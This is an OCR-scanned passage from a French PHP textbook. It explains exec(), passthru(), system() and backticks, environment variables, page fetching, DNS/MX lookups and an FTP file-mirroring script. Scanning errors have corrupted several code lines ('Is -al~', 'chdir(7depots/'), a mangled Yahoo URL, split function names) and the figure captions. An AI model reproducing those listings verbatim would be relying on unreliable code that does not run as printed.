commandes pour mettre en place un frontal pour le gestionnaire de listes de diffusion 
ezmlm. Nous aurons egalement l'occasion de nous en servir lorsque nous en viendrons a 
l'etude de cas d'ecole, un peu plus loin dans cet ouvrage. 

Pour executer une commande sur un serveur web, vous disposez de quatre techniques. 
Elles sont assez semblables les unes aux autres et ne se differencient que sur quelques 
points mineurs : 

1. exec() 

Son prototype est le suivant : 

string exec (string commande [, array ^resultat [, int &valeur_retour]]) 
II suffit done de passer a la fonction exec ( ) la commande a executer, comme ici : 
exec ("Is -la"); 

exec( ) ne produit pas de resultat direct, mais elle renvoie la derniere ligne du resultat 
de 1' execution de la commande. 

Si vous passez le deuxieme parametre resultat, celui-ci contiendra en sortie un 
tableau de chaines dont chacune represente une ligne du resultat de 1' execution de la 
commande. Si vous passez une variable comme troisieme parametre (valeur retour), 
celle-ci contiendra en sortie le code de retour de la commande. 

2. passthru( ) 

Son prototype est le suivant : 

void passthru (string commande [, int valeur_retour] ) 

La fonction passthru() affiche directement son resultat dans la fenetre du naviga- 
teur (elle est tres utile pour les resultats binaires, comme les donnees de type 
image). Elle ne renvoie rien. 

Ses parametres fonctionnent comme ceux de exec ( ) . 

3. system( ) 

Son prototype est le suivant : 

string system (string commande [, int valeur_retour] ) 

Cette fonction affiche le resultat de 1' execution de la commande dans la fenetre du 
navigateur. A la difference de passthru (), la fonction system () essaie d'afficher 
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chaque ligne de la sortie a mesure de leur obtention (quand PHP est execute en tant 
que module du serveur). Elle renvoie la derniere ligne de resultat en cas de succes, 
ou false en cas d'echec. 

Ses parametres fonctionnent comme ceux des fonctions precedentes. 

4. Backticks, ou apostrophes inverses. 

Nous avons deja brievement mentionne les apostrophes inverses au Chapitre 1. Ce 
sont, en realite, des operateurs d'execution. 

Les apostrophes inverses ne produisent aucun resultat direct, elles renvoient le 
resultat de 1' execution de la commande sous la forme d'une chaine. 

Si vos besoins sont plus sophistiques, vous pouvez egalement utiliser les fonctions 
popen ( ) , proc open ( ) et proc close ( ) ; celles-ci servent a lancer des processus exter- 
nes et a rediriger vers eux des donnees (et, inversement, a rapatrier les donnees qu'ils 
produisent). 

Le script du Listing 17.7 illustre l'usage de ces differentes fonctions. 

Listing 17.7 : progex.php — Fonctions de statut des fichiers et leurs resultats 

<?php 

chdir(7depots/') ; 

///// Version exec() 
echo '<pre>'; 

// Unix 

exec('ls -la', $resultat); 
// Windows 

// exec('dir', $resultat); 
foreach ($resultat as $ligne) 
echo "$ligne\n"; 

echo '</pre>'; 

echo '<br /><hr /><br />'; 

///// Version passthru() 
echo '<pre>'; 

// Unix 

passthru('ls -la') ; 

// Windows 

// passthru('dir') ; 

echo '</pre>'; 

echo '<br /><hr /><br />'; 

///// Version system() 

echo '<pre>'; 
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// Unix 

$resultat = system('ls -la'); 
// Windows 

// $resultat = system('dir') ; 

echo '</pre>'; 

echo '<br /><hr /><br />'; 

///// Version apostrophes inverses 

echo '<pre>'; 
// Unix 

$resultat = ' Is -al~ ; 
// Windows 

// $resultat = 'dir' ; 
echo $resultat; 
echo '</pre>'; 

?> 



Chacune de ces approches aurait pu etre envisagee a la place du script d'exploration des 
repertoires etudie plus haut. Notez toutefois que ce code met en evidence l'un des 
inconvenients de recourir a des commandes externes : la portabilite. Nous nous sommes 
ici servis de commandes Unix et il est clair que le code ne peut pas s'executer sur 
Windows. 

Si vous prevoyez d'inclure des donnees soumises par l'utilisateur dans la commande a 
executer, assurez-vous de toujours traiter au prealable celle-ci avec la fonction esca 
peshellcmd(). Cette fonction empeche en effet les utilisateurs mal intentionnes 
d'executer des commandes sur votre systeme. Vous pouvez, par exemple, utiliser cette 
fonction de la maniere suivante : 

system(escapeshellcmd($commande) ) ; 

II est egalement conseille de toujours faire appel a la fonction escapeshellarg ( ) pour 
proteger les parametres que vous passez a une commande du shell. 

Interaction avec I'environnement : getenvQ et putenvQ 

Nous terminerons ce chapitre en examinant comment utiliser les variables d'environne- 
ment a partir de code PHP. Deux fonctions sont disponibles a cet effet : getenv( ), qui 
permet de retrouver des variables d'environnement, et putenv(), qui s'emploie pour 
definir des variables d'environnement. Notez que ce que nous appelons ici environne- 
ment est I'environnement dans lequel PHP est execute sur le serveur. 

Vous pouvez obtenir la liste de toutes les variables d'environnement de PHP en executant 
la fonction phpinf o ( ) . Certaines variables sont plus utiles que d'autres. Par exemple : 

getenv( " HTTPREFERER" ) ; 

renvoie l'URL de la page a partir de laquelle l'utilisateur a accede a la page courante. 
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Vous pouvez aussi definir des variables d'environnement en fonction de vos besoins, 
par exemple : 

$home = "/home/nobody"; 
putenv ( "H0ME=$home" ) ; 

Si vous etes administrateur systeme et que vous souhaitiez limiter les variables d'envi- 
ronnement que les programmeurs sont autorises a configurer, utilisez la directive 
safe mode allowed env vars de php.ini. Lorsque PHP s'execute en mode securise, 
les utilisateurs ne peuvent definir que les variables d'environnement dont les prefixes 
sont enumeres dans cette directive. 

— Info 

Pour plus d'informations sur des variables d'environnement specifiques, consultez la specifi- 
cation de CGI, sur la page http://hoohoo.ncsa.uiuc.edu/cgi/env.html. 



Pour aller plus loin 

En PHP, la plupart des fonctions de manipulation du systeme de fichiers correspondent 
a des fonctions du systeme d' exploitation sous-jacent. Si vous utilisez Unix, vous trou- 
verez des informations precieuses dans les pages de man. 

Pour la suite 

Au Chapitre 18, nous verrons comment utiliser les fonctions PHP de reseau et de proto- 
coles pour interagir avec d'autres systemes que votre propre serveur web, ce qui 
donnera encore plus de perspectives aux scripts PHP. 



18 



Utilisation des fonctions de reseau 

et de protocole 

Ce chapitre decrit les fonctions orientees reseau de PHP, qui permettent d'interagir avec 
le reste d'Internet par le biais de scripts PHP Un monde rempli de ressources s'ouvre 
alors a vous et il existe toute une gamme de protocoles pour les utiliser. 

Vue d'ensemble des protocoles reseau 

Les protocoles sont des regies de communication pour des situations donnees. Par 
exemple, le protocole de communication entre deux individus est bien connu : chacun 
salue 1' autre, des poignees de main sont echangees, une discussion s'engage et prend 
fin, puis chacun prend conge de 1' autre avec une formule d' adieu. Les diverses situa- 
tions possibles requierent divers protocoles. En outre, les utilisateurs d'autres cultures 
peuvent s'attendre a utiliser des protocoles differents, ce qui rend l'interaction difficile. 
Les protocoles des reseaux informatiques sont similaires. 

Tout comme les protocoles humains, differents protocoles informatiques sont utilises 
dans des situations et des applications differentes. Ainsi, vous utilisez le protocole 
HTTP (HyperText Transfer Protocol) lorsque vous demandez et recevez des pages 
web : votre ordinateur demande un document (HTML ou PHP) a un serveur web, qui 
lui repond en renvoyant le document souhaite. Vous avez probablement aussi deja 
utilise FTP (File Transfer Protocol) pour transferer des fichiers entre des ordinateurs en 
reseau. II existe encore bien d'autres protocoles. 

La plupart des protocoles et autres standards Internet sont decrits dans des documents 
appeles RFC (Requests For Comments). lis sont elabores et precisement dermis par le 
groupe de travail IETF (Internet Engineering Task Force). Les RFC sont largement 
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disponibles sur Internet. Leur "depot" officiel se situe a l'URL http://www.rfc- 
editor.org/. 

A chaque fois que vous travaillez sur un protocole particulier, vous avez tout interet a 
consulter les documents qui le definissent, car ils font autorite et se reveleront souvent 
tres utiles pour deboguer votre code. Toutefois, ils sont tres detailles et peuvent contenir 
plusieurs centaines de pages. 

Les documents RFC2616 et RFC822, qui decrivent respectivement le protocole 
HTTP/ 1.1 et le format des courriers electroniques sur Internet, sont des exemples de 
RFC bien connus. 

Dans ce chapitre, nous examinerons des aspects de la programmation PHP lorsque Ton 
utilise certains de ces protocoles. Nous nous pencherons plus particulierement sur 
l'envoi de courriers electroniques avec SMTP, sur la lecture de courriers electroniques 
avec P0P3 et IMAP4, sur la connexion avec d'autres serveurs web avec HTTP et 
HTTPS et sur le transfert de fichiers avec FTP. 

Envoi et reception de courriers electroniques 

La fonction mail() est le moyen le plus simple d'envoyer des courriers electroni- 
ques via un script PHP. Nous avons deja etudie cette fonction en detail au Chapi- 
tre 4, si bien que nous n'y reviendrons pas dans ce chapitre. Cette fonction utilise le 
protocole SMTP (Simple Mail Transfer Protocol) pour envoyer les courriers elec- 
troniques. 

II existe toute une gamme de classes librement disponibles, qui permettent d'elargir 
les possibility's de la fonction mail ( ) . Au Chapitre 28, nous utiliserons la classe d'un 
module pour envoyer des pieces jointes HTML a un message. Le protocole SMTP, 
quant a lui, est reserve a l'envoi du courrier. Les protocoles IMAP4 (Internet 
Message Access Protocol, decrit dans le RFC2060) et P0P3 (Post Office Protocol, 
decrit dans les RFC1939 ou STD0053) servent a lire les courriers electroniques a 
partir d'un serveur de messagerie. Ces protocoles ne sont pas con£us pour l'envoi de 
messages. 

Le protocole IMAP4 permet de lire et de manipuler des courriers electroniques conser- 
ves sur un serveur. II est plus sophistique que le protocole P0P3, qui ne sait que tele- 
charger les courriers vers un client et les supprimer du serveur. 

PHP comprend une bibliotheque IMAP4 qui n'est pas limitee aux connexions IMAP4 
puisqu'elle permet egalement d'utiliser les protocoles P0P3 et NNTP (Network News 
Transfer Protocol). Le projet decrit au Chapitre 27 fait un usage intensif de cette biblio- 
theque. 
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Utilisation des donnees d'autres sites web 

Un des grands atouts du Web est qu'il permet d'utiliser, de modifier et d'incorporer des 
informations et des services existants dans vos pages. PHP permet de realiser tres faci- 
lement une telle operation, comme le montre l'exemple qui suit. 

Considerons le cas d'une entreprise desireuse d'afficher sa cotation en Bourse sur la 
page d'accueil de son site. L' information est disponible quelque part sur l'un des sites 
boursiers, mais comment y acceder automatiquement ? 

Nous devons tout d'abord connaitre l'URL de la source d'origine de cette information. 
Nous pourrons ensuite etablir une connexion avec cette URL a chaque visite sur la page 
d'accueil, recuperer la page et extraire les informations qui nous interessent. 

Le Listing 18.1 presente un script qui permet de recuperer et de mettre en forme une 
cotation boursiere affichee sur le site du NASDAQ. Ici, nous recuperons la cotation 
boursiere d'Amazon.com (vous pouvez naturellement inclure d'autres informations 
dans votre page, mais le principe est le meme). 

Listing 18.1 : recherche.php — Recuperation sur le site du NASDAQ de la cotation 
boursiere portant le symbole indique dans $symbole 



<html> 
<head> 

<title>Cotation boursiere du NASDAQ</title> 
</head> 
<body> 
<?php 

// Choix de la cotation 
$symbole = ' AMZN ' ; 

echo "<h1>Cotation de $symbole</h1>" ; 

$url = "http://finance.yahoo.eom/d/ 

quotes. csv?s=$symbole&e=.csv&f=sl1d1t1c1ohg" ; 

if (!($contenu = f ile_get_contents($url) ) ) { 
die( " Impossible d'ouvrir $url"); 

} 

// Extraction des donnees pertinente 

list($symbole, $cote, $date, $heure) = explode(',', $contenu); 
$date = trim($date, 1 " ' ) ; 
$heure = trim($heure, 111 '); 

echo "<p>$symbole etait vendu a $cote</p>"; 
echo "<p>Cote actuelle du $date, a $heure</p>"; 

// Cite la source 

echo "<p>Ces informations ont ete obtenues a partir de<br />" . 
"<a href =\ "$url\ ">$url</a></p>" ; 

?> 
</body> 
</html> 
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La Figure 18.1 montre un exemple d' execution du script du Listing 18.1. 



Figure 18.1 

Le script du Listing 18. 1 
extrait la cotation 
boursiere de /'information 
lue sur le site boursier. 



Cotation boursiere du NASDAQ 



Cotation de AMZN 

"AMZN" ctait vcndu a 61.4499 

Cote actucllc du 10/8/2008, a 2:49pm 

Ccs informations out etc obtcnucs a partir de 

httQ://finaiict:.vahoo .cont'd/quotes .csv?s=AMZN&c=.csv&f=slldltlclohe 



Le code du Listing 18.1 est en lui-meme relativement simple ; en fait, il n'utilise que 
des fonctions que nous avons deja etudiees. 

Quand nous avons evoque la lecture des fichiers au Chapitre 2, nous avions 
mentionne que les fonctions sur les fichiers pouvaient egalement servir a lire des 
donnees a partir d'une URL, et e'est exactement ce que nous faisons ici. L'appel a 
file get contents ( ) : 

if (!($contenu = f ile_get_contents ($url) ) ) 

renvoie le texte entier de la page web situee a l'URL indiquee et le stocke dans 
$contenu. 

Les fonctions sur les fichiers de PHP peuvent egalement faire beaucoup plus. L' exem- 
ple precedent charge simplement une page web via HTTP, mais vous pouvez interagir 
avec d'autres serveurs via HTTPS, FTP et d'autres protocoles exactement de la meme 
maniere. Pour certaines taches, il se peut que vous deviez choisir une approche plus 
specialisee. Certaines fonctionnalites FTP, par exemple, sont disponibles dans les fonc- 
tions FTP specifiques mais pas via f open ( ) et les autres fonctions de fichier. Vous trou- 
verez un exemple utilisant les fonctions FTP dans la suite de ce chapitre. Pour certaines 
taches HTTP ou HTTPS, vous pouvez avoir besoin de la bibliotheque cURL, qui vous 
permettra de vous connecter a un site web et d'imiter la navigation d'un utilisateur dans 
quelques pages. 

Lorsque vous avez obtenu le texte de la page a partir de file get contents ( ) , vous pouvez 
utiliser une la fonction list ( ) pour extraire les parties de la page que vous souhaitez : 

list($symbole, $cote, $date, $heure) = explode(',', $contenu); 
$date = trim($date, 1 " ' ) ; 
$heure = trim($heure, 111 '); 

echo "<p>$symbole etait vendu a $cote</p>"; 
echo "<p>Cote actuelle du $date, a $heure</p>"; 
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Et c'est fini ! 

Cette approche peut s'appliquer a diverses situations. Vous pouvez de la meme maniere 
recuperer la meteo locale et l'incorporer dans votre propre site, par exemple. 

Le meilleur usage qui peut etre fait de cette approche consiste a combiner des informa- 
tions provenant de differentes sources. Le site de Philip Greespun, qui dresse un petit 
bilan de l'etat de la richesse de Bill Gates, en est un bon exemple. Ce site est situe a 
l'URL http://www.phiIip.greenspun.com/WealthClock. 

Cette page puise ses informations a deux sources. Elle tire le nombre d' habitants actuel 
des Etats-Unis du site de l'agence de recensement des Etats-Unis, et elle recupere la 
valeur actuelle d'une action Microsoft. Ces deux elements d'information sont combines 
avec les opinions de l'auteur du site, de facon a etablir l'estimation de l'etat courant de 
la fortune de Bill Gates. 

Une remarque : si vous utilisez a des fins commerciales une source d'information 
externe, il est preferable d'obtenir l'accord prealable des proprietaries du site source. 
Dans certains cas, il faut tenir compte des questions de propriete intellectuelle. 

Si vous suivez cette approche sur votre propre site, vous devrez peut-etre envoyer des 
donnees. Par exemple, si vous vous connectez a une URL exterieure, vous devrez 
peut-etre passer des parametres saisis par l'utilisateur. Dans ce cas, vous pouvez 
recourir a la fonction urlencode( ). Cette fonction prend une chaine en parametre et 
la convertit dans un format approprie pour une URL ; par exemple, en transformant 
les espaces en signes plus. L'appel de cette fonction doit etre formule de la maniere 
suivante : 

$parametre_encode = urlencode($parametre) ; 

Un probleme de cette approche est que le site depuis lequel vous recuperez vos infor- 
mations risque de changer le format des donnees, ce qui empechera votre script de 
fonctionner. 

Utilisation de fonctions de recherche reseau 

PHP offre tout un ensemble de fonctions de "recherche" susceptibles de vous inte- 
resser pour verifier des informations sur les noms d'hotes, les adresses e-mail et les 
echanges de courriers electroniques. Par exemple, un site de type "annuaire" comme 
Yahoo! a tout interet a verifier automatiquement, lorsque de nouvelles URL lui sont 
soumises, que les hotes de ces URL et les informations de contact pour ces sites sont 
valides. 

Le Listing 18.2 montre le code HTML d'un formulaire de soumission pour un site du 
type "annuaire". 



446 Partie IV 



Techniques PHP avancees 



Listing 18.2 : soumission_site.html — Code HTML d'un formulaire de proposition 
d'un site 



<html> 
<head> 

<title>Soumission d'un site</title> 
</head> 
<body> 

<h1 >Soumission d'un site</h1> 
<form method=post action="soumission_site.php"> 
URL : <input type=text name="url" size=30 value="http : // "><br /> 
Contact email : <input type=text name="email" size=23><br /> 
<input type=" submit" name="Soumission du site"> 
</f orm> 
</body> 
</html> 



Un exemple d'utilisation de ce formulaire est montre a la Figure 18.2, avec quelques 
donnees saisies. 

Soumission d'ur site 

Soumission d'un site 



URL : http:// 
Contact email : 

C Envoyer") 

Termini d 

Figure 18.2 

Les propositions de sites sur un site de type "annuaire " exigent habituellement la saisie de I'URL 
du site propose et des informations de contact, afin que les administrateurs de I'annuaire puissent 
confirmer I'enregistrement a ceux qui en ont fait la demande. 

Lorsqu'on clique sur le bouton Soumission du site, il faut d'abord verifier que l'URL 
est bien hebergee sur un ordinateur et que la partie hote de l'adresse du courrier elec- 
tronique est valide. Nous avons ecrit un script qui realise ces operations ; la page qu'il 
produit est presente a la Figure 18.3. 

Le script qui effectue ces verifications (voir le Listing 18.3) utilise deux des fonctions 
reseau de PHP : gethostbyname ( ) et getmxrr ( ). 
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Resultats de la soumission d'un site 

C * I > ("e) (x) ClTW^T ) - ( jpo ) (g) ©- 
Resultats de la soumission du site 

L'hStc a I'adresse IP 66.201 .40.103 

Lc courtier est dclivrd via : pearson.fr.mail5.psmtp.com 

pcarson.fr.mail6.psmtp.com pcarson.fr.mail7.psmtp.com 

pcarson .fr.mail 8 .psmtp .com 

Tons les details fournis sont corrects. 

Mcrci d'avoir propose" votrc site. 

II sera bicntSt visitfi par un membre dc notre cquipe. 

Termini ^ 



Figure 18.3 

Cette version du site affiche les resultats de la verification des noms d'hotes pour I'URL et I'adresse 
de courrier electronique. La version de production d'un tel script ne presenterait certainement pas 
de cette facon les resultats des tests mais, dans le cadre de notre exemple, il est interessant de voir 
les informations renvoyees par nos contrdles. 

Listing 18.3 : soumission_site.php — Script verifiant I'URL et I'adresse de courrier 
electronique 



<html> 
<head> 

<title>Resultats de la soumission d'un site</title> 
</head> 
<body> 

<h1 >Resultats de la soumission du site</h1> 
<?php 

// Extraction des donnees contenues dans les champs 

$url = $_REQUEST[ 'url' ] ; 
$email = $_REQUEST[ 1 email '] ; 

// Verification de I'URL 

$url = parse_url($url) ; 

$hote = $url[ ' host ' ] ; 

if (!($ip = gethostbyname($hote) ) ) { 

echo "L'lP de hote de I'URL n'est pas valide"; 

exit; 

} 

echo "L'hote a I'adresse IP $ip <br />"; 

// Verification de I'adresse e-mail 

$email = explode( '@' , $email); 
$hote_email = $email[1]; 
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II Notez que la fonction dns_get_mx( ) n'est pas "implementee" dans 

// les versions Windows de PHP 

if ( !dns_get_mx($hote_email, $tab_mx)) { 

echo "L'lP de l'hote de l'adresse email n'est pas valide"; 

exit ; 

} 

echo "Le courrier est delivre via : "; 
foreach ($tab_mx as $mx) { 
echo "$mx "; 

} 

// Si une connexion a pu etre etablie, tout est correct 

echo "<br />Tous les details fournis sont corrects. <br />"; 
echo "Merci d'avoir propose votre site.<br />" 

. "II sera bientot visite par un membre de notre equipe."; 

// En situation reelle, ajout du site dans la base de donnees 
// des sites a visiter... 

?> 

</body> 
</html> 



Examinons ce script en detail. 

Pour commencer, l'URL est extraite et nous lui appliquons la fonction parse url(), 
qui renvoie un tableau associatif contenant les differentes parties de l'URL. Ces diffe- 
rents elements portent les noms suivants : scheme, user, pass, host, port, path, query 
et fragment. Generalement, ils ne sont pas tous exploites, mais voici un exemple de la 
maniere dont ils composent une URL. 

Si l'URL suivante est passee en parametre a parse url ( ) : 

http: //nobody : sec ret@exemple.com : 80 /script . php?variable=valeur#ancre 

la fonction renverra un tableau contenant les elements suivants : 

■ scheme : http:// 



user 
pass 
host 
port 
path 
query 



nobody 
secret 
exemple . com 
80 

script . php 
: variable=valeur 



fragment : ancre 
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Dans le script du Listing 18.3, nous ne nous interessons qu'a l'information host. Par 
consequent, on l'extrait du tableau au moyen des lignes suivantes : 

$url = parse_url($url) ; 
$hote = $url[ 1 host 1 ] ; 

Une fois cette extraction operee, nous pouvons connaitre l'adresse IP correspondant a 
cet hote si celui-ci se trouve dans le systeme des noms de domaine, ou DNS (Domain 
Name System). Pour cela, nous faisons appel a la fonction gethostbyname( ), qui 
renvoie l'adresse IP si elle existe, ou la valeur false sinon : 

$ip = gethostbyname($hote) 

On peut egalement proceder en sens inverse avec la fonction gethostbyaddr( ), qui 
prend une adresse IP en parametre et retourne le nom d'hote. Si vous appelez ces deux 
fonctions l'une a la suite de l'autre, il se peut tres bien que le nom d'hote obtenu au final 
soit different du nom d'hote de depart. Un tel resultat peut signifier que le site utilise un 
service d'hebergement virtuel ou un ordinateur physique et un hote d' adresse IP hebergent 
plusieurs noms de domaine. 

Si l'URL est valide, le script peut passer au test de l'adresse de courrier electronique. 
Tout d'abord, cette derniere est decomposed en un nom d'utilisateur et un nom d'hote, 
par un appel a la fonction explode ( ) : 

$email = explode('@', $email) ; 
$hote_email = $email[1]; 

Une fois que le nom d'hote a ete extrait de l'adresse, le script verifie qu'il correspond a 
un emplacement reel avec la fonction dns get mx ( ) : 

dns_get_mx($hote_email, $tab_mx) 

Cette fonction renvoie l'ensemble des enregistrements MX (Mail eXchange) de 
l'adresse qui lui est passee dans le tableau que vous lui avez fourni avec $tab mx. 

Un enregistrement MX est enregistre dans le DNS et est traite comme un nom d'hote. 
L' ordinateur liste dans 1' enregistrement MX n'est pas necessairement celui sur lequel 
aboutira le courrier electronique : il s'agit plutot d'un ordinateur qui sait ou acheminer 
l'e-mail (comme il peut y avoir plusieurs MX, la fonction renvoie un tableau plutot 
qu'un nom d'hote). Si le DNS ne contient pas d' enregistrement MX, cela signifie que le 
courrier electronique ne peut pas avoir de destination finale. 

Notez que la fonction dns get mx ( ) n'est pas implemented dans les versions Windows 
de PHP. Si vous utilisez Windows, vous devriez etudier le paquetage PEAR:Net_DNS, 
qui reglera ce probleme. 

Si tous les tests sont effectues avec succes, les donnees recuperees avec ce formulaire 
peuvent etre enregistrees dans une base de donnees, en vue de leur traitement ulterieur 
par un membre de l'equipe. 
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Outre les fonctions que nous venons de decrire, vous pouvez utiliser la fonction chec 
kdnsrr( ), plus generique, qui prend un nom d'hote en parametre et renvoie la valeur 
true si le DNS contient au moins un enregistrement pour celui-ci. 

Utilisation de FTP 

Le protocole FTP (File Transfer Protocol) s'emploie pour le transfert de fichiers entre 
les hotes en reseau. Avec PHP, vous pouvez utiliser la fonction fopen( ), ainsi que les 
diverses fonctions de manipulation de fichiers, que ce soit pour une connexion FTP ou 
pour une connexion HTTP Ces fonctions permettent d'etablir la connexion avec un 
serveur FTP et de transferer des fichiers vers ou depuis ce serveur. Toutefois, l'installa- 
tion PHP standard offre egalement tout un jeu de fonctions specialement cogues a cet 
effet. 

Par defaut, ces fonctions ne sont pas integrees dans 1' installation standard. Pour en 
beneficier sous Unix, vous devez recompiler PHP en executant configure avec l'option 
enable ftp dans le repertoire des sources de PHP, puis en lancant a nouveau make. 
Ces fonctions FTP sont automatiquement activees dans 1' installation standard sous 
Windows. 

Pour plus d' informations sur la configuration de PHP, reportez-vous a 1' Annexe A. 

Sauvegarde d'un fichier ou creation d'un enregistrement miroir d'un 
fichier 

Les fonctions FTP sont tres utiles pour deplacer et copier des fichiers vers ou depuis 
d'autres hotes. On les utilise souvent pour sauvegarder un site web ou faire un miroir de 
fichiers a un autre emplacement. Le script du Listing 18.4 est un exemple simple 
d'utilisation des fonctions FTP pour faire un miroir d'un fichier. 

Listing 18.4 : miroirjftp.php — Script de telechargement des nouvelles versions 
d'un fichier a partir d'un serveur FTP 



<html> 
<head> 

<title>Mise a jour du miroir</title> 
</head> 
<body> 

<h1>Mise a jour du miroir</h1> 
<?php 

// Adapte ces variables a votre situation 
$hote = 'ftp.cs.rmit.edu.au'; 
$utilisateur = 'anonymous'; 
$mdp = 'moi@exemple.com'; 

$f ichier_distant = ' /pub/tsg/teraterm/ttssh14.zip' ; 
$f ichier_local = ' /tmp/writable/ttssh14.zip' ; 
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// Connexion a l'hote 
$conn = f tp_connect ($hote) ; 
if (!$conn) { 

echo 'Erreur : Impossible de se connecter au serveur FTP.<br />'; 
exit; 

} 

echo "Connecte a $hote.<br />"; 

// Ouverture d'une session sur l'hote cible 
$resultat = @ftp_login($conn, $utilisateur, $mdp); 
if ( !$resultat) { 

echo "Erreur : Echec de la connexion comme $utilisateur . <br />"; 

ftp_quit($conn) ; 

exit; 

} 

echo "Connecte comme $utilisateur.<br />"; 

// Verification des dates des fichiers afin de determiner s'il est 
// necessaire de proceder a une mise a jour 

echo 'Verification de la date de modification du f ichier. . .<br />'; 
if (f ile_exists ($f ichier_local) ) { 

$date_locale = filemtime($fichier_local) ; 

echo ' Le f ichier local a ete modifie le '; 

echo date('G:i j-M-Y', $date_locale) ; 

echo ' <br> ' ; 
} else { 

$date_locale = 0; 

} 

$date_distante = ftp_mdtm($conn, $f ichier_distant) ; 
if ( ! ($date_distante >= 0)) { 

// Cela ne signifie pas que le f ichier n'est pas present ; 

// le serveur ne prend peut-etre pas en charge la datation des 

// dernieres modifications 

echo "Impossible d'obtenir la date du fichier distant. <br />"; 
$date_distante = $date_locale +1; // force la mise a jour 
} else { 

echo ' Le fichier distant a ete modifie le '; 
echo date('G:i j-M-Y', $date_distante) ; 
echo ' <br /> ' ; 

} 

if ( ! ($date_distante > $date_locale) ) { 
echo 'La copie locale est a jour.<br />'; 
exit; 

} 

// Telechargement du fichier 

echo 'Chargement du fichier a partir du serveur ... <br />'; 
$fp = fopen ($f ichier_local, 'w'); 

if (!$succes = ftp_fget($conn, $fp, $fichier_distant, FTP_BINARY) ) { 
echo 'Erreur : Impossible de telecharger le fichier.'; 
ftp_quit($conn) ; 
exit ; 

} 

fclose($f p) ; 

echo ' Le telechargement du fichier a reussi. ' ; 
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II Fermeture de la connexion vers l'hote 
ftp_quit ($conn) ; 

?> 

</body> 
</html> 



La Figure 18.4 montre un exemple d'execution de ce script. 



Figure 18.4 

Le script du Listing 18.4 veri- 
fie si la version locale d'un 
fichier est a jour et telecharge 
une nouvelle version si ce 
n'est pas le cas. 



o n n 



Moziiila Firefox 



CD 



Mise a jour du miroir 

Conncctc a ftp.cs.rrait.cdu.au 

Conncctc commc anonymous 

Verification dc la date dc modification du fichier.. 

Lc fichier local a etc" modiftf; le 6-M-20TJ8 

Lc fichier distant a 6l6 modific" lc 15-Jun-2008 

La copic locale est k jour. 



Ce script est relativement generique. II commence par la definition de quelques variables : 

$hote = 'ftp.cs.rmit.edu.au'; 
$utilisateur = 'anonymous'; 
$mdp = 'me@exemple.com'; 

$f ichier_distant = ' /pub/tsg/teraterm/ttssh1 4 . zip ' ; 
$f ichier_local = ' /tmp/writable/ttssh14. zip ' ; 

La variable $hote doit contenir le nom du serveur FTP auquel se connecter, tandis que 
les variables $utilisateur et $mdp correspondent respectivement au nom d'utilisateur 
et au mot de passe avec lesquels ouvrir la session. 

De nombreux sites FTP prennent en charge les sessions anonymes, ou un nom d'utilisa- 
teur est mis a disposition du public, de sorte que tout le monde puisse se connecter. 
Louverture d'une session de ce type ne requiert aucun mot de passe. La moindre des 
politesses est toutefois alors de laisser son adresse de courrier electronique afin que les 
administrateurs du systeme puissent connaitre la provenance des utilisateurs de leur 
site, et e'est ce que nous faisons ici. 

La variable $f ichier distant contient le chemin d'acces au fichier a telecharger. Dans 
notre exemple, il s'agit de telecharger et d'enregistrer une copie locale de Tera Term 
SSH, un client SSH (Secure SHell, qui est une version securisee de telnet avec chiffrement) 
pour Windows. 
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La variable $f ichier local contient le chemin d'acces de 1'emplacement ou sera enre- 
gistre le fichier telecharge sur notre ordinateur. Ici, nous avons cree un repertoire appele 
/tmp/writable dont les permissions ont ete definies de sorte que PHP puisse y ecrire. 
Quel que soit votre systeme d'exploitation, vous devez creer ce repertoire pour que le 
script fonctionne. Si votre systeme d'exploitation possede des permissions strictes, 
vous devrez vous assurer qu'elles autorisent votre script a y ecrire. Pour utiliser le script 
du Listing 18.4, vous devez definir le contenu de ces variables en fonction de votre 
situation particuliere. 

Les etapes suivies par ce script sont les memes que celles d'un telechargement manuel 
d'un fichier via FTP a partir d'une interface en ligne de commande : 

1 . Connexion au serveur FTP distant. 

2. Ouverture d'une session (soit en tant qu'utilisateur reconnu, soit en tant qu'utilisateur 
anonyme). 

3. Test determinant si le fichier distant a ete mis a jour. 

4. Si c'est le cas, telechargement du fichier. 

5. Fermeture de la connexion FTP. 

Examinons successivement en detail chacune de ces etapes. 

Connexion au serveur FTP 

Cette etape est equivalente a la saisie de : 

ftp nomhote 

a une invite de commande sur une plate-forme Windows ou Unix. En PHP, cette etape 
est realisee a l'aide des lignes suivantes : 

$conn = f tp_connect ($hote) ; 
if (!$conn) { 

echo "Erreur : Impossible de se connecter au serveur FTP.<br />"; 
exit; 

} 

echo "Connecte a $hote.<br />"; 

Ce code appelle la fonction ftp connect() qui prend un nom d'hote en parametre et 
renvoie soit un descripteur de connexion, soit false si la connexion n'a pu etre etablie. 
La fonction ftp connect ( ) peut egalement prendre comme second parametre facultatif 
le numero de port de l'hote auquel se connecter (on ne l'utilise pas ici). Lorsque aucun 
numero de port n'est precise, la fonction ftp connect ( ) utilise le port 21, qui est le 
port par defaut pour FTP. 
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Ouverture d'une session sur le serveur FTP 

La deuxieme etape consiste a ouvrir une session en tant qu'utilisateur reconnu avec un 
mot de passe particulier. C'est la fonction ftp login () qui permet d'accomplir cette 
operation dans un script PHP : 

$resultat = @ftp_login($conn, $utilisateur, $mdp); 
if (!$resultat) { 

echo "Erreur : Impossible de se connecter comme $utilisateur.<br />"; 

ftp_quit($conn) ; 

exit; 

} 

echo "Connecte comme $utilisateur.<br />"; 

La fonction ftp login () prend trois parametres : un descripteur de connexion FTP 
obtenu avec ftp connect ( ) , un nom d'utilisateur et un mot de passe. Elle renvoie true 
si l'utilisateur peut ouvrir une session et false dans le cas contraire. Notez la presence 
du symbole @ avant l'appel de la fonction pour supprimer les erreurs. Nous procedons 
de cette maniere car, en son absence, si l'utilisateur ne peut pas ouvrir de session, 
l'interpreteur PHP affiche dans la fenetre du navigateur un message d'erreur. Ici, nous 
capturons 1' erreur en testant $resultat et en fournissant un message d'erreur 
personnalise, plus convivial. 

Notez qu'en cas d'echec de la tentative d'ouverture de session la connexion FTP est 
fermee avec la fonction ftp quit. 

Verification de la date du fichier 

Pour mettre a jour une copie locale d'un fichier, il est judicieux de s'assurer de la neces- 
site d'une telle mise a jour. En effet, il est inutile de telecharger de nouveau un fichier, 
notamment s'il est volumineux, alors que vous disposez deja de la version actuelle. Ce 
faisant, vous eviterez de surcharger inutilement le trafic sur le reseau. Examinons le 
code qui verifie la date des mises a jour. 

Les dates des fichiers sont une bonne raison d'utiliser les fonctions FTP plutot qu'un 
